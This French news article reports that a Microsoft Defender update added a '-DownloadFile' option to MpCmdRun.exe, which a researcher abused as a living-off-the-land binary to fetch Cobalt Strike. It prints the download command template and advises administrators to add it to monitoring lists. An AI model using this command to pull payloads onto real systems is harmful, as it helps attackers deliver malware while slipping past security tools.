Skip to main content

L'antivirus de Windows 10 pourrait être détourné pour télécharger des logiciels malveillants

Microsoft Defender
(Crédit photo: Microsoft)

Une mise à jour récente de Microsoft Defender aurait créé une vulnérabilité inquiétante au sein du logiciel antivirus attitré de Windows 10. Celui-ci pourrait ainsi être exploité pour télécharger des fichiers malveillants en ligne.

Selon le testeur Mohammad Askar, quelques modifications apportées sur les lignes de commande de Microsoft Defender permettraient aux hackers d'utiliser le logiciel comme un script malveillant - sous l’architecture LOLBin. De nombreux LOLBins sont présents sous Windows 10, ils remplissent tous une fonction légitime. Cependant, avec les bons privilèges, les pirates informatiques peuvent abuser de ces fichiers binaires pour contourner les installations de sécurité et mener des attaques sans que la victime ne soit alertée.

Une méthode assez basique

Comme l'a indiqué Askar, l'outil de ligne de commande de Microsoft Defender prend désormais en charge une nouvelle fonction « -DownloadFile ». Nous pensons que ce changement a pris effet avec la version 4.18.2007.9 ou 4.18.2009.9 de Microsoft Defender.

En conséquence, un hacker s’infiltrant sur un réseau local pourrait utiliser l'utilitaire de ligne de commande du service anti-malware de Microsoft pour télécharger un fichier sur Internet. Ce, avec la commande suivante : « MpCmdRun.exe -DownloadFile -url <url> -path <local-path> ».

En usant de cette technique, M. Askar a pu télécharger à distance le malware Cobalt Strike, directement via Microsoft Defender.

Bien que Defender détecte et atténue tout fichier malveillant transitant par cette technique, il n'est pas certain que d'autres services antivirus populaires se révèlent en mesure de se défendre contre ce type d'attaque… dans les cas où les protections natives ont été désactivées.

Il est conseillé aux administrateurs système de mettre à jour leurs listes de surveillance pour y inclure le nouveau LOLBin, afin de s'assurer que celui-ci ne soit pas utilisé pour concevoir une attaque de grande ampleur.

Via Bleeping Computer